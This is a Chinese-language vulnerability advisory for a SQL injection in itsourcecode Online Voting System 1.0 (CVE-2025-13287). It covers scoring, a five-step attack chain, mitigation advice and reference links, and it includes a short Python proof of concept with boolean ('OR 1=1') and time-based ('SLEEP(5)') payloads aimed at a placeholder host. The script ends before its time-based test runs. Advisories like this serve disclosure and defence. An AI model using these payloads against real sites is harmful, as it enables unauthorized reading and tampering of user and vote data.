CVE-2025-13287 itsourcecode Online Voting System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13287

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Voting System 1.0

漏洞概述

CVE-2025-13287是itsourcecode Online Voting System 1.0版本中存在的SQL注入安全漏洞。该漏洞位于/index.php页面的categories功能模块，攻击者可以通过操纵id或category参数注入恶意SQL代码。由于该漏洞可通过远程网络利用，且不需要高权限认证即可发起攻击，因此存在较高的实际威胁。漏洞影响系统的机密性、完整性和可用性，可能导致数据库敏感信息泄露、篡改或服务中断。此漏洞已公开披露利用代码，建议尽快采取修复措施。

技术细节

该SQL注入漏洞存在于itsourcecode Online Voting System 1.0的/index.php文件中，具体位于page=categories功能模块。漏洞源于应用程序对用户输入的id和category参数缺乏充分的输入验证和参数化查询处理。攻击者可以通过构造特殊的SQL语句片段，利用参数id或category进行SQL注入攻击。由于系统未对特殊字符进行过滤或使用预编译语句，恶意SQL代码可能被数据库执行。成功利用此漏洞可实现未授权数据库访问、数据提取、权限提升等操作。该漏洞属于OWASP Top 10中的A03:2021-Injection类别，CVSS 3.1评分为6.3，属于中危级别。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用itsourcecode Online Voting System 1.0，确认存在/index.php?page=categories端点

STEP 2

漏洞探测

通过构造SQL注入测试载荷（如单引号、布尔盲注）探测id/category参数是否存在SQL注入漏洞

STEP 3

构造恶意载荷

根据探测结果，构造针对性的SQL注入载荷，可选方式包括：联合查询注入、布尔盲注、时间盲注等

STEP 4

执行攻击

通过HTTP请求将恶意SQL代码注入目标参数，绕过认证或获取未授权数据库访问权限

STEP 5

数据窃取/篡改

成功注入后，攻击者可提取数据库中的敏感信息（用户密码、投票数据等）或修改数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13287 SQL Injection PoC
# Target: itsourcecode Online Voting System 1.0
# Vulnerability: SQL Injection in /index.php?page=categories

target_url = "http://target-site.com/index.php"

# SQL Injection payload for boolean-based blind injection
payload = "' OR 1=1 -- -"

params = {
    'page': 'categories',
    'id': payload  # or use 'category': payload
}

print(f"[*] Testing CVE-2025-13287 SQL Injection")
print(f"[*] Target: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.get(target_url, params=params, timeout=10)
    
    # Check for SQL error messages or different response behaviors
    if "SQL syntax" in response.text or "mysql" in response.text.lower():
        print("[!] Vulnerability confirmed - SQL error detected")
    elif response.status_code == 200:
        print("[+] Potential vulnerability - No error blocking detected")
    else:
        print(f"[-] Response status: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Time-based blind SQL injection test
time_payload = "' AND SLEEP(5) -- -"
params_time = {
    'page': 'categories',
    'id': time_payload
}

print(f"\n[*] Testing time-based blind SQL injection...")

影响范围

itsourcecode Online Voting System 1.0

防御指南

临时缓解措施

立即对所有用户输入参数实施输入验证，使用预编译语句处理数据库查询。暂时禁用受影响的categories功能模块，或通过配置Web应用防火墙规则阻止可疑的SQL注入请求。限制数据库账户权限，避免注入成功后获得过高权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13287
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13287
3 Details https://www.cvedetails.com/cve/CVE-2025-13287/
4 VulDB https://vuldb.com/cve/CVE-2025-13287
5 Link https://github.com/WANGshuyan2025/cve/issues/9
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332627
8 Link https://vuldb.com/?id.332627
9 Link https://vuldb.com/?submit.690889
10 Link https://vuldb.com/?submit.690891